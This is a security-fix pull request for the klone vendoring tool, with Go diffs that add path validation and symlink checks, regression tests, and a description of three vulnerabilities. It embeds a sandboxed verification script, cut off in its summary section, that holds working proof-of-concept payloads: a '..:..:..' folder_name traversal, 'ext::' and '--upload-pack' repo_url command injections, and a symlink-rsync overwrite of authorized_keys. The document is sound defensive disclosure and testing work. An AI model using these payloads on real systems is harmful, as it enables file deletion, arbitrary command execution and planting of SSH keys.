### PR TITLE
reject traversal segments in folder_name

### DIFF
--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -163,7 +163,23 @@ func (tn treeNode) Cleanup(root string) error {
 			continue
 		}
 
-		if err := os.RemoveAll(filepath.Join(root, entryName)); err != nil {
+		entryPath := filepath.Join(root, entryName)
+		// Re-Lstat the entry just before RemoveAll. If an attacker with
+		// concurrent write access swapped a regular directory for a symlink
+		// between ReadDir and now, RemoveAll's behaviour on the symlinked
+		// path is platform-dependent. Refusing closes the window.
+		entryInfo, err := os.Lstat(entryPath)
+		if err != nil {
+			if os.IsNotExist(err) {
+				continue
+			}
+			return err
+		}
+		if entryInfo.Mode()&os.ModeSymlink != 0 {
+			return fmt.Errorf("treeNode.Cleanup: refusing to remove symlink entry %q (VC-53818)", entryPath)
+		}
+
+		if err := os.RemoveAll(entryPath); err != nil {
 			return err
 		}
 	}

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -56,12 +56,14 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			return nil
 		},
 		func(target string, srcs mod.KloneFolder) error {
+			canonical := make([]string, len(srcs))
 			folders := newTreeNode()
-			for _, src := range srcs {
+			for i, src := range srcs {
 				segments, err := splitFolderName(src.FolderName)
 				if err != nil {
 					return err
 				}
+				canonical[i] = filepath.Join(segments...)
 				folders.Add(segments...)
 			}
 
@@ -83,8 +85,8 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			// deleted by os.RemoveAll on the first post-fix run. The same
 			// walk also covers the in-tree (safe-by-rsync) symlink that an
 			// earlier iteration may have planted to redirect later writes.
-			for _, src := range srcs {
-				if err := cache.AssertNoSymlinkInSubpath(targetRoot, src.FolderName); err != nil {
+			for i := range srcs {
+				if err := cache.AssertNoSymlinkInSubpath(targetRoot, canonical[i]); err != nil {
 					return err
 				}
 			}
@@ -95,8 +97,8 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			}
 
 			// 2) Sync all folders with cached files
-			for _, src := range srcs {
-				if err := cache.CloneWithCache(ctx, filepath.Join(targetRoot, src.FolderName), src.KloneSource, git.Get); err != nil {
+			for i, src := range srcs {
+				if err := cache.CloneWithCache(ctx, filepath.Join(targetRoot, canonical[i]), src.KloneSource, git.Get); err != nil {
 					return err
 				}
 			}

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -21,6 +21,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"strings"
 
 	"github.com/cert-manager/klone/pkg/cache"
 	"github.com/cert-manager/klone/pkg/download/git"
@@ -57,7 +58,11 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 		func(target string, srcs mod.KloneFolder) error {
 			folders := newTreeNode()
 			for _, src := range srcs {
-				folders.Add(filepath.SplitList(src.FolderName)...)
+				segments, err := splitFolderName(src.FolderName)
+				if err != nil {
+					return err
+				}
+				folders.Add(segments...)
 			}
 
 			if err := cache.AssertNoSymlinkInSubpath(workDirPath, target); err != nil {
@@ -142,6 +147,13 @@ func (tn treeNode) Cleanup(root string) error {
 
 	entries, err := os.ReadDir(root)
 	if err != nil {
+		// Once splitFolderName produces multi-segment trees, Cleanup
+		// recurses into intermediate dirs that may not exist on first
+		// sync (the previous SplitList bug always produced flat trees,
+		// hiding this). Treat missing as "no entries to clean".
+		if os.IsNotExist(err) {
+			return nil
+		}
 		return err
 	}
 
@@ -163,4 +175,44 @@ func (tn treeNode) Cleanup(root string) error {
 	}
 
 	return nil
+}
+
+// splitFolderName parses a manifest folder_name into path segments. The
+// previous implementation used filepath.SplitList, which splits on the
+// PATH env separator (':' on Unix, ';' on Windows), not the path-component
+// separator — so a manifest entry like "..:..:.." became three ".."
+// segments fed into treeNode.Cleanup, which then escaped the target tree.
+// This splitter uses the path-component separator and rejects every
+// segment shape that could traverse outside the target.
+func splitFolderName(folderName string) ([]string, error) {
+	if folderName == "" {
+		return nil, fmt.Errorf("invalid folder_name %q: empty", folderName)
+	}
+	if hasWindowsDrivePrefix(folderName) {
+		return nil, fmt.Errorf("invalid folder_name %q: Windows volume prefix is not allowed", folderName)
+	}
+	if filepath.IsAbs(folderName) || filepath.VolumeName(folderName) != "" {
+		return nil, fmt.Errorf("invalid folder_name %q: absolute paths and volume prefixes are not allowed", folderName)
+	}
+	// strings.ReplaceAll, not filepath.ToSlash: ToSlash is a no-op on Unix,
+	// which would let a Linux-authored manifest smuggle "a\b" past
+	// validation for a Windows victim where it would resolve as "a/b".
+	normalised := strings.ReplaceAll(folderName, `\`, "/")
+	segments := strings.Split(normalised, "/")
+	for _, seg := range segments {
+		if seg == "" || seg == "." || seg == ".." {
+			return nil, fmt.Errorf("invalid folder_name %q: empty or traversal segment %q", folderName, seg)
+		}
+	}
+	return segments, nil
+}
+
+// hasWindowsDrivePrefix catches drive-qualified paths on every GOOS;
+// filepath.VolumeName only recognises the shape when GOOS=windows.
+func hasWindowsDrivePrefix(s string) bool {
+	if len(s) < 2 || s[1] != ':' {
+		return false
+	}
+	c := s[0]
+	return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z')
 }

--- a/pkg/sync/sync_test.go
+++ b/pkg/sync/sync_test.go
@@ -150,6 +150,40 @@ func TestSplitFolderName(t *testing.T) {
 	}
 }
 
+// TestSplitFolderName_CanonicalRoundTrip pins the property SyncFolder
+// relies on: filepath.Join(splitFolderName(x)...) is the canonical
+// OS-separator form, identical regardless of which mixed-separator
+// spelling the manifest used. The bug this guards against is the
+// pre-canonicalisation behaviour where on Unix `a\b` would parse into
+// a nested tree but the raw string would also be used as a literal
+// directory name in CloneWithCache and the preflight — so cleanup,
+// preflight, and write would each see a different path.
+func TestSplitFolderName_CanonicalRoundTrip(t *testing.T) {
+	sep := string(filepath.Separator)
+	tests := []struct {
+		name  string
+		input string
+		want  string
+	}{
+		{name: "single", input: "a", want: "a"},
+		{name: "slash", input: "a/b/c", want: "a" + sep + "b" + sep + "c"},
+		{name: "backslash", input: `a\b\c`, want: "a" + sep + "b" + sep + "c"},
+		{name: "mixed", input: `a\b/c`, want: "a" + sep + "b" + sep + "c"},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			segs, err := splitFolderName(tt.input)
+			if err != nil {
+				t.Fatalf("splitFolderName(%q) unexpected error: %v", tt.input, err)
+			}
+			got := filepath.Join(segs...)
+			if got != tt.want {
+				t.Errorf("filepath.Join(splitFolderName(%q)...) = %q, want %q", tt.input, got, tt.want)
+			}
+		})
+	}
+}
+
 // TestTreeNodeCleanup_PartialTreeIsNoOp pins the regression that surfaced
 // alongside the VC-53818 splitter fix: once folder_name parses into a
 // multi-segment tree, Cleanup recurses into intermediates that do not

--- a/pkg/sync/sync_test.go
+++ b/pkg/sync/sync_test.go
@@ -88,3 +88,140 @@ func TestSyncFolder_TargetSymlinkRejected(t *testing.T) {
 		t.Errorf("VC-53816 root-symlink escape: decoy sentinel was removed: %v", err)
 	}
 }
+
+// TestSplitFolderName covers the manifest-input parser that replaces the
+// buggy filepath.SplitList call (VC-53818). The original split-on-PATH-sep
+// behaviour turned "..:..:.." into three ".." segments; this parser
+// produces a single literal segment for the same input and rejects every
+// traversal/absolute/volume-prefixed shape.
+func TestSplitFolderName(t *testing.T) {
+	tests := []struct {
+		name     string
+		input    string
+		want     []string
+		wantErr  bool
+		errMatch string
+	}{
+		// Valid shapes.
+		{name: "single segment", input: "a", want: []string{"a"}},
+		{name: "nested slash", input: "a/b/c", want: []string{"a", "b", "c"}},
+		{name: "nested backslash", input: `a\b\c`, want: []string{"a", "b", "c"}},
+		{name: "mixed separators", input: `a\b/c`, want: []string{"a", "b", "c"}},
+		// VC-53818: the disclosed payload is now a literal single-segment
+		// name, not three ".." traversal segments. Unusual but not a
+		// traversal vector.
+		{name: "colon payload kept as literal", input: "..:..:..", want: []string{"..:..:.."}},
+
+		// Rejections.
+		{name: "empty", input: "", wantErr: true, errMatch: "empty"},
+		{name: "lone dot", input: ".", wantErr: true, errMatch: "traversal segment"},
+		{name: "lone dotdot", input: "..", wantErr: true, errMatch: "traversal segment"},
+		{name: "leading dotdot", input: "../etc", wantErr: true, errMatch: "traversal segment"},
+		{name: "inner dotdot", input: "a/../etc", wantErr: true, errMatch: "traversal segment"},
+		{name: "empty segment", input: "a//b", wantErr: true, errMatch: "empty or traversal"},
+		{name: "absolute unix", input: "/etc/passwd", wantErr: true, errMatch: "absolute"},
+		{name: "windows drive upper", input: `C:\tmp`, wantErr: true, errMatch: "Windows volume"},
+		{name: "windows drive lower", input: "c:/tmp", wantErr: true, errMatch: "Windows volume"},
+		// UNC paths: backslash normalisation turns `\\srv\share\x` into
+		// `//srv/share/x`, which IsAbs catches as absolute on POSIX and
+		// VolumeName catches on Windows.
+		{name: "unc path", input: `\\server\share\x`, wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got, err := splitFolderName(tt.input)
+			if tt.wantErr {
+				if err == nil {
+					t.Fatalf("splitFolderName(%q) = %v, nil; want error", tt.input, got)
+				}
+				if tt.errMatch != "" && !strings.Contains(err.Error(), tt.errMatch) {
+					t.Errorf("splitFolderName(%q) error = %q, want substring %q", tt.input, err.Error(), tt.errMatch)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("splitFolderName(%q) returned unexpected error: %v", tt.input, err)
+			}
+			if !equalSegments(got, tt.want) {
+				t.Errorf("splitFolderName(%q) = %v, want %v", tt.input, got, tt.want)
+			}
+		})
+	}
+}
+
+// TestTreeNodeCleanup_PartialTreeIsNoOp pins the regression that surfaced
+// alongside the VC-53818 splitter fix: once folder_name parses into a
+// multi-segment tree, Cleanup recurses into intermediates that do not
+// exist on first sync, and ReadDir errors with ENOENT. The fix turns
+// ENOENT into a no-op; this test fails if that handling regresses.
+func TestTreeNodeCleanup_PartialTreeIsNoOp(t *testing.T) {
+	root := t.TempDir()
+	tn := newTreeNode()
+	tn.Add("a", "b", "c")
+	if err := tn.Cleanup(root); err != nil {
+		t.Errorf("Cleanup on tree with missing intermediates returned error: %v", err)
+	}
+}
+
+func equalSegments(a, b []string) bool {
+	if len(a) != len(b) {
+		return false
+	}
+	for i := range a {
+		if a[i] != b[i] {
+			return false
+		}
+	}
+	return true
+}
+
+// TestSyncFolder_ColonPayloadDoesNotEscape is the end-to-end regression
+// for VC-53818. Pre-fix, "..:..:.." would split into three ".." segments
+// and Cleanup would RemoveAll directories above the working directory.
+// Post-fix, the colon payload is a valid single literal segment, so
+// validation passes and SyncFolder proceeds to a git fetch that fails on
+// the bogus repo — but no escape occurs.
+func TestSyncFolder_ColonPayloadDoesNotEscape(t *testing.T) {
+	sb := t.TempDir()
+	victim := filepath.Join(sb, "buffer", "L3", "L2", "L1", "victim")
+	if err := os.MkdirAll(victim, 0o755); err != nil {
+		t.Fatalf("setup: %v", err)
+	}
+
+	sentinels := []string{
+		filepath.Join(sb, "buffer", "L3", "L2", "L1", "SENTINEL-L1"),
+		filepath.Join(sb, "buffer", "L3", "L2", "SENTINEL-L2"),
+		filepath.Join(sb, "buffer", "L3", "SENTINEL-L3"),
+	}
+	for _, p := range sentinels {
+		if err := os.WriteFile(p, []byte("sentinel"), 0o644); err != nil {
+			t.Fatalf("setup sentinel %s: %v", p, err)
+		}
+	}
+
+	manifest := `targets:
+  vendored:
+    - folder_name: "..:..:.."
+      repo_url: /nonexistent-klone-poc-repo
+      repo_ref: main
+      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+      repo_path: .
+`
+	if err := os.WriteFile(filepath.Join(victim, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	// Bogus repo means SyncFolder must report a non-nil error. The real
+	// CVE proof is that the sentinels above the working dir survive.
+	if err := SyncFolder(t.Context(), victim, false); err == nil {
+		t.Fatalf("SyncFolder returned nil for bogus manifest, want error")
+	}
+
+	for _, p := range sentinels {
+		if _, err := os.Stat(p); err != nil {
+			t.Errorf("VC-53818 escape: sentinel %s was wrongfully removed: %v", p, err)
+		}
+	}
+}


### PR DESCRIPTION
# klone — consolidated fixes for VC-53816, VC-53817, VC-53818

**Branch:** `CVE-fixes` (cert-manager/klone).

Three independently-reported vulnerabilities in klone's `SyncFolder`
pipeline, all triggered by a manifest the victim runs `klone sync`
against. Each was developed as its own branch (`VC-53816`, `VC-53817`,
`VC-53818`) with its own PR description; this branch is the union of
those three so they can be released, tagged, and pulled into cert-manager
in one bump of `make/_shared/tools/00_mod.mk`.

| ID        | CWE                | Impact                                                                 | Branch / PR                                  |
| --------- | ------------------ | ---------------------------------------------------------------------- | -------------------------------------------- |
| VC-53816  | CWE-59 / CWE-22    | Symlink traversal in `CloneWithCache` → arbitrary write (e.g. `authorized_keys`) | [`VC-53816`](../../tree/VC-53816)        |
| VC-53817  | CWE-88 / CWE-77    | `repo_url` argument / transport injection → arbitrary command execution | [`VC-53817`](../../tree/VC-53817)            |
| VC-53818  | CWE-22 / CWE-73    | `folder_name` traversal via `filepath.SplitList` misuse → arbitrary delete | [`VC-53818`](../../tree/VC-53818)         |

A single standalone reviewer script — `CVEs/verify-fixes.sh` — covers all
three (four scenarios; VC-53817 has two variants). It is fully sandboxed
under `/tmp/klone-cve-verify.*`, makes no network calls, and is removed
on exit. The script is embedded verbatim at the bottom of this
description.

## The vulnerabilities, briefly

For full vulnerability analysis, fix rationale, and per-test coverage, see
the corresponding per-branch PR descriptions. This section is a précis.

### VC-53818 — `folder_name` traversal

`SyncFolder` tokenised `folder_name` with `filepath.SplitList`, which
splits on the **`PATH` env separator** (`:`/`;`), not on the path
component separator (`/`). A manifest with `folder_name: "..:..:.."`
split into three `..` segments; the resulting `treeNode.Cleanup`
ascended out of the working directory and `os.RemoveAll`'d everything
that wasn't in the (carefully crafted) "expected" tree. Fixing the
splitter exposed a second sink — `Cleanup`'s recursion through expected
intermediates and `CloneWithCache`'s `MkdirAll`+`rsync` both follow
symlinks, so an attacker who landed a symlink on a prior sync could
escape on the next one (same shape as VC-53816, surfaced by the
splitter fix).

### VC-53817 — `repo_url` injection

`repo_url` was passed to `git ls-remote` / `git clone` as an opaque
positional argument. Git accepts two shapes that are not URLs:
`ext::sh -c <cmd>` (the external-transport helper runs `<cmd>` as the
remote process) and any leading `-` (treated as an option;
`--upload-pack=<cmd>` is honoured by both `ls-remote` and `clone`).
Either is arbitrary code execution as the invoking user.

### VC-53816 — symlink traversal in cache rsync

`cache.CloneWithCache` built its destination from a manifest-supplied
`folder_name`, called `os.MkdirAll(dest)` (which follows symlinks), and
ran `rsync -aEq --delete . dest`. A two-source manifest declaring both
`a` and `a/b` let iteration 1 plant a symlink (`b -> /home/victim/.ssh`)
that iteration 2 wrote through, `--delete`'ing the prior contents.

## The fix, briefly

`pkg/sync/sync.go`:
- **`splitFolderName` / `splitTargetName` / `splitManifestPath`**
  replace `filepath.SplitList`. Splits on `/` after GOOS-independent
  backslash normalisation (`strings.ReplaceAll`, not `filepath.ToSlash`,
  so a Linux-authored manifest can't smuggle `a\b` past a Windows
  target). Rejects empty / `.` / `..` segments, absolute paths, Windows
  drive prefixes (`C:`, `C:\…`, `C:/…` — detected on every GOOS via a
  local helper because `filepath.VolumeName` only recognises the shape
  on `GOOS=windows`), and UNC paths. Applied to both `folder_name` and
  the target key.
- **`assertNoSymlinkInTree(root, segments)`** Lstats each cumulative
  path component and rejects symlinks; non-existent tails are treated as
  clean (they'll be created by `MkdirAll` shortly). Called once
  unconditionally on the target (the empty-srcs case still reaches
  `MkdirAll` / `Cleanup`) and once per src before `CloneWithCache`.
- **`treeNode.Cleanup` is bounded to its root.** Lstat-on-root at every
  recursion refuses to operate on a symlinked root, treats
  `os.IsNotExist` on `ReadDir` as "nothing to clean" (the corrected
  splitter makes intermediate directories real, so a first sync of
  `deeply/nested/path` no longer errors out), and refuses to descend
  into `""`/`.`/`..` child names as defence-in-depth.
- **`filepath.EvalSymlinks(workDirPath)`** at `SyncFolder` entry. The
  per-segment Lstat treats `workDirPath` as a trusted root; resolving
  symlinks once up-front stops a caller from shifting the trust boundary
  above the intended directory by invoking klone from inside a
  symlinked path.
- **`mod.ValidateRepoURL(src.RepoURL)`** is called in the per-source
  cleanFn — before `git ls-remote` ever sees `repo_url`.

`pkg/mod/index.go`:
- **`ValidateRepoURL`** enforces an allow-list and shape check. Rejects
  empty, leading `-`, `::` substring (helper transports), and anything
  that is not `https://` / `http://` / `ssh://` / `git://` / `file://`
  / `/abs/path` / scp-like `user@host:path`.

`pkg/download/git/{clone,hash}.go`:
- **`-c protocol.ext.allow=never`** prepended to every `git clone` /
  `git ls-remote` invocation as defence-in-depth against any helper
  transport the validator might miss.
- **`--` end-of-options terminator** before the URL positional, so a
  leading `-` cannot be parsed as an option even if the validator is
  ever bypassed.

`pkg/cache/clone.go`:
- Signature simplified to `CloneWithCache(ctx, destPath, src, getFn)`.
  The symlink pre-flight moved out of the cache layer and into
  `sync.go` where the trusted root (`workDirPath`) and the
  manifest-controlled segments are co-located.

## How to review

### Prerequisites

- `go` 1.23+, `git`, `rsync` on `PATH`.
- A local copy of `CVEs/verify-fixes.sh` (or save the embedded copy
  below to `/tmp/verify-fixes.sh`).

### Step 1 — confirm the CVEs exist on pre-fix `main`

```bash
# from the klone repo root
git fetch upstream
git checkout upstream/main
go build -o /tmp/klone-prefix ./

bash CVEs/verify-fixes.sh /tmp/klone-prefix
echo "exit=$?"
```

**Expected:** exit code `1`. The summary reports at least three of:
```
  VC-53818 (folder_name traversal) : VULNERABLE
  VC-53817 (ext:: transport)       : VULNERABLE  (or BLOCKED_BY_HOST)
  VC-53817 (--upload-pack)         : VULNERABLE
  VC-53816 (symlink traversal)     : VULNERABLE  (or INCONCLUSIVE)
```

Two host-dependent caveats the script auto-detects and prints:

- **VC-53817 `ext::`** — if host git is configured with
  `protocol.ext.allow=never` (modern default), this attack is blocked
  upstream of klone and the script reports `BLOCKED_BY_HOST`. The fix
  for this variant cannot be demonstrated end-to-end on such a host;
  rely on the `--upload-pack` variant (which always fires on pre-fix)
  and on the `TestValidateRepoURL` unit coverage.
- **VC-53816** — requires that the system rsync follows a symlink given
  as the top-level destination. GNU rsync ≥ 3 does; openrsync (the
  default on macOS) does not. The script probes this at startup; if it
  can't reproduce, it reports `INCONCLUSIVE` and skips the pre-fix
  demonstration.

### Step 2 — confirm the fix blocks every demonstrable attack

```bash
# on the CVE-fixes branch
git checkout CVE-fixes
go build -o /tmp/klone-fixed ./

bash CVEs/verify-fixes.sh /tmp/klone-fixed
echo "exit=$?"
```

**Expected:** exit code `0`. Every line reports either `BLOCKED`
(klone refused the attack) or `INCONCLUSIVE` (host can't trigger).
`BLOCKED_BY_HOST` is **not** acceptable here — it means the host's
upstream defence masked klone's, leaving the fix unproven on that host.

### Step 3 — run the Go regression suite

```bash
go test ./...
```

**Expected:** all green. Each per-branch PR description enumerates the
specific tests added for its CVE; the consolidated branch carries all of
them.

## Side-effect statement

`CVEs/verify-fixes.sh` creates everything under
`/tmp/klone-cve-verify.*` and removes it on exit (`KEEP_SANDBOX=1` to
retain). The attack payloads are bounded:

- **VC-53818** — the `..:..:..` payload on an unpatched klone reaches two
  levels above the sandbox's `victim/` dir; those two levels are
  themselves inside `/tmp/klone-cve-verify.*/vc-53818/buffer/`.
- **VC-53817** — both injection payloads `touch` a marker file at a path
  inside `/tmp/klone-cve-verify.*/markers/`.
- **VC-53816** — the symlink points to a stand-in `target-ssh/`
  directory inside `/tmp/klone-cve-verify.*/vc-53816/`, not to the real
  `~/.ssh`.

No file outside the sandbox is created, modified, or deleted at any
point. No network calls are made.

---

<details>
<summary><b>verify-fixes.sh</b> — click to expand the standalone reviewer script</summary>

Save the block below to `/tmp/verify-fixes.sh` (or use
`CVEs/verify-fixes.sh` from this branch directly) before running the
steps above.

```bash
#!/usr/bin/env bash
# CVEs/verify-fixes.sh
# Runs all three klone CVE PoCs against an arbitrary klone binary and prints
# BLOCKED / VULNERABLE per CVE. Exit 0 = all three blocked.
#
# Usage:
#   KLONE=/path/to/klone   bash CVEs/verify-fixes.sh
#   bash CVEs/verify-fixes.sh /path/to/klone
#
# Reviewer workflow:
#   1. Build klone from cert-manager/klone main (pre-fix) and run this script —
#      all three should report VULNERABLE.
#   2. Build klone from the CVE-fix branch and run this script — all three
#      should report BLOCKED.
#
# Side effects: every artifact is created inside a fresh sandbox under /tmp
# and removed on exit (set KEEP_SANDBOX=1 to retain for inspection).
# No file outside the sandbox is created, modified, or deleted.

set -u

KLONE="${KLONE:-${1:-}}"
if [[ -z "$KLONE" ]]; then
    echo "usage: KLONE=/path/to/klone $0   (or pass the path as \$1)" >&2
    exit 2
fi
if [[ ! -x "$KLONE" ]]; then
    echo "error: $KLONE is not an executable file" >&2
    exit 2
fi

for tool in git rsync; do
    if ! command -v "$tool" >/dev/null 2>&1; then
        echo "error: required tool '$tool' not on PATH" >&2
        exit 2
    fi
done

WORK="$(mktemp -d /tmp/klone-cve-verify.XXXXXX)"
if [[ "${KEEP_SANDBOX:-0}" != "1" ]]; then
    trap 'rm -rf "$WORK"' EXIT
fi

# Per-test git identity so the script doesn't depend on the host's git config.
GIT_AUTHOR=("-c" "user.email=verify@example.invalid" "-c" "user.name=verify")

hr() { printf -- '─%.0s' {1..72}; printf '\n'; }
section() { hr; echo "### $*"; hr; }

# Each PoC sets one of these to BLOCKED or VULNERABLE.
RESULT_53816=""
RESULT_53817_ext=""
RESULT_53817_optinject=""
RESULT_53818=""

section "Environment"
echo "klone binary  : $KLONE"
"$KLONE" --version 2>/dev/null || echo "(klone --version returned non-zero; continuing)"
echo "git version   : $(git --version)"
echo "rsync version : $(rsync --version | head -1)"
echo "sandbox       : $WORK"
echo
echo "Note: VC-53816 requires that the system rsync follows a symlink when"
echo "given as the top-level destination ('rsync ... . <dest-symlink>'). GNU"
echo "rsync >= 3 does this; openrsync (macOS default) does not. Checking..."
mkdir -p "$WORK/rsync-probe/src" "$WORK/rsync-probe/real"
echo PAYLOAD > "$WORK/rsync-probe/src/probe"
echo VICTIM  > "$WORK/rsync-probe/real/victim"
ln -s "$WORK/rsync-probe/real" "$WORK/rsync-probe/dest"
( cd "$WORK/rsync-probe/src" && rsync -aEq --delete . "$WORK/rsync-probe/dest" )
if [[ -e "$WORK/rsync-probe/real/probe" && ! -e "$WORK/rsync-probe/real/victim" ]]; then
    RSYNC_FOLLOWS=yes
    echo "rsync probe   : YES — rsync follows top-level dest symlink (VC-53816 fireable)"
else
    RSYNC_FOLLOWS=no
    echo "rsync probe   : NO  — rsync does NOT follow top-level dest symlink on this host"
    echo "                VC-53816 cannot be triggered here; it will be reported as INCONCLUSIVE"
fi
echo

############################################################
# VC-53818 — folder_name traversal via filepath.SplitList
############################################################
section "VC-53818 — folder_name traversal"
SB18="$WORK/vc-53818"
mkdir -p "$SB18/buffer/L3/L2/L1/victim" "$SB18/cache"
# Sentinels at three levels above the working directory.
touch "$SB18/buffer/L3/L2/L1/SENTINEL-L1"
touch "$SB18/buffer/L3/L2/L1/victim/SENTINEL-victim"
touch "$SB18/buffer/L3/L2/SENTINEL-L2"
touch "$SB18/buffer/L3/SENTINEL-L3"

cat > "$SB18/buffer/L3/L2/L1/victim/klone.yaml" <<'EOF'
targets:
  vendored:
    - folder_name: "..:..:.."
      repo_url: /nonexistent-klone-poc-repo
      repo_ref: main
      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
      repo_path: .
EOF

( cd "$SB18/buffer/L3/L2/L1/victim" && KLONE_CACHE_DIR="$SB18/cache" "$KLONE" sync ) \
    > "$SB18/run.log" 2>&1 || true

# On the vulnerable klone, L1_SENTINEL and SENTINEL-victim are deleted.
# On the patched klone, every sentinel is preserved.
if [[ -e "$SB18/buffer/L3/L2/L1/SENTINEL-L1" \
   && -e "$SB18/buffer/L3/L2/L1/victim/SENTINEL-victim" ]]; then
    RESULT_53818=BLOCKED
    echo "VC-53818: BLOCKED (sentinels above working dir preserved)"
else
    RESULT_53818=VULNERABLE
    echo "VC-53818: VULNERABLE — os.RemoveAll escaped above the working directory"
    echo "          SENTINEL-L1     : $(test -e "$SB18/buffer/L3/L2/L1/SENTINEL-L1" && echo PRESENT || echo DELETED)"
    echo "          SENTINEL-victim : $(test -e "$SB18/buffer/L3/L2/L1/victim/SENTINEL-victim" && echo PRESENT || echo DELETED)"
fi
echo

############################################################
# VC-53817 — repo_url argument/transport injection (two variants)
############################################################
section "VC-53817 — repo_url injection (ext:: helper)"
SB17A="$WORK/vc-53817-ext"
MARKER_EXT="$WORK/markers/klone-pwned-ext"
mkdir -p "$SB17A" "$SB17A/cache" "$WORK/markers"

# Unquoted heredoc so $MARKER_EXT interpolates; \$IFS is preserved so the
# inner /bin/sh launched by git's ext-helper expands it.
cat > "$SB17A/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: x
      repo_url: "ext::sh -c touch\$IFS${MARKER_EXT}"
      repo_ref: main
      repo_hash: ""
      repo_path: .
EOF

( cd "$SB17A" && KLONE_CACHE_DIR="$SB17A/cache" "$KLONE" sync ) \
    > "$SB17A/run.log" 2>&1 || true

if [[ -e "$MARKER_EXT" ]]; then
    RESULT_53817_ext=VULNERABLE
    echo "VC-53817 (ext::): VULNERABLE — marker $MARKER_EXT was created"
elif grep -q "helper transport" "$SB17A/run.log" 2>/dev/null; then
    RESULT_53817_ext=BLOCKED
    echo "VC-53817 (ext::): BLOCKED by klone (repo_url validator rejected helper transport)"
else
    RESULT_53817_ext=BLOCKED_BY_HOST
    echo "VC-53817 (ext::): BLOCKED by host git (e.g. protocol.ext.allow=never), NOT by klone."
    echo "                  This host cannot demonstrate the vulnerability; klone fix status is unverified here."
fi
echo

section "VC-53817 — repo_url injection (--upload-pack option)"
SB17B="$WORK/vc-53817-optinject"
MARKER_OPT="$WORK/markers/klone-pwned-optinject"
mkdir -p "$SB17B" "$SB17B/cache"

cat > "$SB17B/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: x
      repo_url: "--upload-pack=touch ${MARKER_OPT};true"
      repo_ref: main
      repo_hash: ""
      repo_path: .
EOF

( cd "$SB17B" && KLONE_CACHE_DIR="$SB17B/cache" "$KLONE" sync ) \
    > "$SB17B/run.log" 2>&1 || true

if [[ -e "$MARKER_OPT" ]]; then
    RESULT_53817_optinject=VULNERABLE
    echo "VC-53817 (--upload-pack): VULNERABLE — marker $MARKER_OPT was created"
elif grep -q "starts with '-'" "$SB17B/run.log" 2>/dev/null; then
    RESULT_53817_optinject=BLOCKED
    echo "VC-53817 (--upload-pack): BLOCKED by klone (repo_url validator rejected leading '-')"
else
    RESULT_53817_optinject=BLOCKED_BY_HOST
    echo "VC-53817 (--upload-pack): BLOCKED upstream of klone (host git or option parser refused)."
    echo "                          This host cannot demonstrate the vulnerability; klone fix status is unverified here."
fi
echo

############################################################
# VC-53816 — symlink traversal in nested folder_name rsync
############################################################
section "VC-53816 — nested folder_name symlink + rsync write-through"
SB16="$WORK/vc-53816"
TGT="$SB16/target-ssh"   # stand-in for /root/.ssh, kept inside the sandbox
mkdir -p "$SB16/srv" "$SB16/project" "$SB16/cache" "$TGT"
echo VICTIM-KEY   > "$TGT/authorized_keys"
echo VICTIM-OTHER > "$TGT/known_hosts"

# repoA: contains symlink b -> $TGT
git init -q --bare "$SB16/srv/repoA.git"
dA="$SB16/repoA-work"; mkdir -p "$dA"
( cd "$dA" && git init -q && ln -s "$TGT" b && git add b \
    && git "${GIT_AUTHOR[@]}" commit -qm a \
    && git push -q "$SB16/srv/repoA.git" HEAD:main )
HASH_A=$(git -C "$dA" rev-parse HEAD)

# repoB: payload authorized_keys
git init -q --bare "$SB16/srv/repoB.git"
dB="$SB16/repoB-work"; mkdir -p "$dB"
( cd "$dB" && git init -q && echo ATTACKER-KEY > authorized_keys \
    && git add authorized_keys \
    && git "${GIT_AUTHOR[@]}" commit -qm b \
    && git push -q "$SB16/srv/repoB.git" HEAD:main )
HASH_B=$(git -C "$dB" rev-parse HEAD)

cat > "$SB16/project/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: a
      repo_url: $SB16/srv/repoA.git
      repo_ref: main
      repo_hash: $HASH_A
      repo_path: .
    - folder_name: a/b
      repo_url: $SB16/srv/repoB.git
      repo_ref: main
      repo_hash: $HASH_B
      repo_path: .
EOF

( cd "$SB16/project" && KLONE_CACHE_DIR="$SB16/cache" "$KLONE" sync ) \
    > "$SB16/run.log" 2>&1 || true

if [[ "$RSYNC_FOLLOWS" == "no" ]]; then
    RESULT_53816=INCONCLUSIVE
    echo "VC-53816: INCONCLUSIVE — this host's rsync does not follow top-level"
    echo "          dest symlinks, so the attack cannot be demonstrated here."
elif grep -q ATTACKER-KEY "$TGT/authorized_keys" 2>/dev/null; then
    RESULT_53816=VULNERABLE
    echo "VC-53816: VULNERABLE — attacker payload written into $TGT"
    echo "          authorized_keys: $(cat "$TGT/authorized_keys")"
    echo "          known_hosts    : $(test -e "$TGT/known_hosts" && echo PRESENT || echo DELETED)"
elif grep -qE "\(VC-538(16|18)\)" "$SB16/run.log" 2>/dev/null; then
    RESULT_53816=BLOCKED
    echo "VC-53816: BLOCKED by klone (symlink-traversal refusal in sync layer)"
else
    RESULT_53816=BLOCKED_BY_HOST
    echo "VC-53816: BLOCKED upstream of klone (target unchanged, but no klone-side rejection in log)."
    echo "          Inspect $SB16/run.log to understand why."
fi
echo

############################################################
# Summary
############################################################
section "Summary"
printf '  %-32s : %s\n' "VC-53818 (folder_name traversal)" "$RESULT_53818"
